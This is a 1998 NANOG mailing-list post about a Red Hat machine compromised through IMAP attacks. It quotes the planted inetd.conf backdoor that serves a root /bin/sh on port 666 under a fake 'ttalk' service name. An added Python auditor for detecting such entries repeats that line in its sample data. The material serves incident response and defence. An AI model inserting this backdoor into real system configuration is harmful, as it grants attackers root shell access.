nanog mailing list archives
Re: IMAP attacks continue
From: Phil Howard <phil () whistler intur net>
Date: Mon, 23 Nov 1998 09:35:17 -0600 (CST)
An addendum to:
I found a machine that had Red Hat 5.1 unmodified running on it, and it got hit. So I closed things off and looked around for damage and found the following:

1. Syslogd had been killed off and the syslog file deleted.

2. A backdoor was installed in /etc/inetd.conf as follows:

    ttalk stream tcp nowait root /bin/sh sh -i

I checked the port assignments from IANA and there is no such thing as "ttalk". I found this line in /etc/services:

    ttalk 666/tcp

so it appears to be hijacking the port used by (as seen in the file ftp://ftp.iana.org/in-notes/iana/assignments/port-numbers):

    mdqs 666/tcp
    mdqs 666/udp
    doom 666/tcp    doom  Id Software
    doom 666/udp    doom  Id Software

So also check /etc/services on any potentially compromised machines.

-- 
Phil Howard KA9WGN | Inturnet, Inc. | Director of Internet Services
Business Internet Solutions | eng at intur.net | philh at intur.net
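The check Phil describes (an inetd.conf entry that hands out a root shell, registered under a made-up name in /etc/services on a port IANA assigns to something else) is easy to automate. The script below is an added example, not code from the post or from any NANOG participant. It parses an inetd.conf and a services file in the classic formats, flags any entry whose server program (or first argument, for tcpd-wrapped entries) is a shell, and cross-checks each service name against a hand-entered subset of the IANA port assignments. The sample inetd.conf and services text are constructed for the example and include the exact backdoor line from the post; the IANA_ASSIGNED table is an assumption covering only the ports used in the sample, and a real audit would load the full IANA list instead.

```python
"""Audit inetd.conf and /etc/services for shell backdoors and hijacked port names.

Added example: demonstrates the check described in the mailing-list post using
constructed sample files; it is not code from the post itself.
"""
import os
from typing import Dict, List, Tuple

# Constructed sample /etc/inetd.conf. The last line is the backdoor from the post.
SAMPLE_INETD_CONF = """\
# <service> <sock_type> <proto> <flags> <user> <server_path> <args>
ftp     stream  tcp     nowait  root        /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root        /usr/sbin/tcpd  in.telnetd
imap    stream  tcp     nowait  root        /usr/sbin/tcpd  imapd
talk    dgram   udp     wait    nobody.tty  /usr/sbin/tcpd  in.talkd
echo    stream  tcp     nowait  root        internal
ttalk   stream  tcp     nowait  root        /bin/sh sh -i
"""

# Constructed sample /etc/services, including the planted "ttalk 666/tcp" line.
SAMPLE_SERVICES = """\
echo     7/tcp
ftp      21/tcp
telnet   23/tcp
imap     143/tcp   imap2
talk     517/udp
ttalk    666/tcp
"""

# Assumed subset of the IANA port-number assignments for the ports above.
# 666/tcp is shared by mdqs and doom in the real list, as quoted in the post.
IANA_ASSIGNED: Dict[Tuple[int, str], str] = {
    (7, "tcp"): "echo",
    (21, "tcp"): "ftp",
    (23, "tcp"): "telnet",
    (143, "tcp"): "imap",
    (517, "udp"): "talk",
    (666, "tcp"): "mdqs/doom",
}

SHELL_PROGRAMS = {"sh", "bash", "csh", "tcsh", "ksh", "zsh", "ash"}


def parse_services(text: str) -> Dict[Tuple[str, str], int]:
    """Map (name, proto) -> port for every /etc/services line (aliases ignored)."""
    services: Dict[Tuple[str, str], int] = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        name, portproto = line.split()[:2]
        port, proto = portproto.split("/")
        services[(name, proto)] = int(port)
    return services


def parse_inetd(text: str) -> List[dict]:
    """Split inetd.conf into entries; the server path and its argv are kept separate."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split(None, 6)
        if len(fields) < 6:
            continue
        entries.append({
            "service": fields[0], "sock": fields[1], "proto": fields[2],
            "flags": fields[3], "user": fields[4], "server": fields[5],
            "args": fields[6] if len(fields) > 6 else "",
        })
    return entries


def audit_inetd(inetd_text: str, services_text: str,
                iana: Dict[Tuple[int, str], str] = IANA_ASSIGNED) -> List[str]:
    """Return one finding string per suspicious inetd entry."""
    findings: List[str] = []
    services = parse_services(services_text)
    for e in parse_inetd(inetd_text):
        where = f"inetd.conf '{e['service']}'"
        if e["server"] != "internal":
            # A shell as the server, or as the program tcpd hands off to, is a backdoor.
            argv = e["args"].split()
            candidates = [os.path.basename(e["server"])]
            if argv:
                candidates.append(os.path.basename(argv[0]))
            if any(p in SHELL_PROGRAMS for p in candidates):
                findings.append(f"{where}: server program is a shell "
                                f"({e['server']} {e['args']}) run as {e['user']}")
        key = (e["service"], e["proto"])
        if key not in services:
            findings.append(f"{where}: no /etc/services entry for "
                            f"{e['service']}/{e['proto']}")
            continue
        port = services[key]
        assigned = iana.get((port, e["proto"]))
        if assigned is None:
            findings.append(f"{where}: port {port}/{e['proto']} has no IANA assignment")
        elif e["service"] not in assigned.split("/"):
            findings.append(f"{where}: port {port}/{e['proto']} is assigned to "
                            f"{assigned} by IANA, not '{e['service']}'")
    return findings


if __name__ == "__main__":
    for finding in audit_inetd(SAMPLE_INETD_CONF, SAMPLE_SERVICES):
        print(finding)
```

On a real host, replace the two sample strings with the contents of /etc/inetd.conf and /etc/services and IANA_ASSIGNED with the full port list; the shell check is the high-signal one, since a legitimate inetd entry never points at an interactive shell, while the name-versus-IANA check will also surface harmless local conventions that need a human to dismiss.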
Current thread:
- IMAP attacks continue Daniel Senie (Nov 22)
- Re: IMAP attacks continue alex (Nov 22)
- Re: IMAP attacks continue Phil Howard (Nov 23)
- Re: IMAP attacks continue Phil Howard (Nov 23)
- Re: IMAP attacks continue Alex P. Rudnev (Nov 24)
- Re: IMAP attacks continue Kevin Houle (Nov 23)
- Re: IMAP attacks continue Alex P. Rudnev (Nov 24)
- Re: IMAP attacks continue Phil Howard (Nov 23)